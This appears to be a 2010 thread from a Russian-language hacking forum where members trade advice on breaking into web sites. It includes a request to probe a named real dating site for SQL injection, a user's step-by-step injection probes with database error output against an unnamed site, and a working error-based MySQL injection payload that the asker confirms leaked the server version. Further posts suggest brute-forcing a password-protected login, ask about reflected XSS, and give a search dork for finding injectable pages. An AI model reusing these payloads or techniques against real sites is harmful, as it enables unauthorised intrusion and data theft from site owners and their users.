22.07.2010, 23:08
|
|
Познающий
Регистрация: 28.06.2010
Сообщений: 91
С нами:
8354486
Репутация:
5
|
|
Anexroid
можно заюзать WebBruteForcer
И если вход через .htaccess то имя пользователя моет быть уже другим!!
|
|
|
22.07.2010, 23:40
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от Gorev
разговор о другой скули друг... посмотри вышe, Попугай имел в виду ошибку на мейл.рy
не заметил(
sry
|
|
|
|
23.07.2010, 00:21
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
Сообщение от None
http://www.bildkontakte.de/?f=kwVerg
|
|
|
|
23.07.2010, 00:49
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от AKYLA
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
что за тупой линк какой ище mssql есле там редирект ?!
|
|
|
|
23.07.2010, 01:11
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами:
8463290
Репутация:
81
|
|
копаю движок:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"
Enter password:
"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
можно ли провести пассивную-xss атаку? как и в каких браузерах? |
|
|
|
23.07.2010, 02:24
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
как же раскрутить скуль
Всем привет!
Помогите советом... как составить запрос, что бы хоть чтонить вывелось... ошибки, etc.
(не могу дать ссылку, т.к. инфа важная)
http://site.com/view.php?id=134
Вот запрос:
SELECT * FROM tbl_art WHERE `GRP_ID` IN (0) AND `OBJ_ID` IN (134)
При view.php?id=134z
SQL ERROR: Unknown column '134z' in 'where clause'
При view.php?id=134z()
SQL ERROR: Column count of mysql.proc is wrong. Expected 20, found 16. Created with MySQL 50077, now running 50148. Please use mysql_upgrade to fix this error.
При view.php?id=999' - выдается сообщение о несуществующей статье (при 999, то же)
При view.php?id=134' - стандартная ошибка sql синтаксиса
При view.php?id=134)+and+(a
SQL ERROR: Unknown column 'a' in 'where clause'
При view.php?id=134)+union+select+(a
SQL ERROR: Unknown column 'a' in 'field list'
При view.php?id=134)+union+select+(user()
SQL ERROR: The used SELECT statements have a different number of columns
При view.php?id=134)+union+select+(1,2
SQL ERROR: Operand should contain 1 column(s)
При view.php?id=134)+union+select+(1),(2),(3),(4 - ошибки нет, но и нет текста статьи
При view.php?id=134)+union+select+1,2,3,4--+ - так же, как и выше
|
|
|
|
23.07.2010, 02:52
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами:
8444531
Репутация:
53
|
|
Сообщение от AKYLA
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
Эта тема вопросы а не "Ей чуваки расскрутите скуль за меня!!1"
site:свой.сайт.ху* filetypehp inurl:id - и тыкай любимые кавычки!!!
|
|
|
|
23.07.2010, 03:05
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами:
8444531
Репутация:
53
|
|
IMMORTAL_S
Трудно сказать без ссылки, хотя б в ПМ что ле раздавал )
стандартные комбинации не подходят?
Попробуй найти другие бажные скрипты, если есть один вполне вероятно что другие там тоже есть )
|
|
|
|
23.07.2010, 03:20
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
IMMORTAL_S
iew.php?id=999'+or+(select+count(*)+from+informati on_schema.tables+group+by+concat(version(),floor(r and(0)*2)))--+
|
|
|
|
23.07.2010, 03:27
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
[Feldmarschall], ты крут
Хотя и пришлось чуть-чуть подправить(не сам код)... но это то что нужно! (метод с Duplicate ложу в копилку)
2 Dare, остался только этот бажный))
Всем спасибо!
SQL ERROR: Duplicate entry '5.1.48-log1' for key 'group_key'
SQL: SELECT * FROM tbl WHERE `GID` IN (0) AND `OID` IN (134) or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))-- )
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2262717){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2262810){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2263064){kind=avatar}
Похожие темы
Комбинированный вид
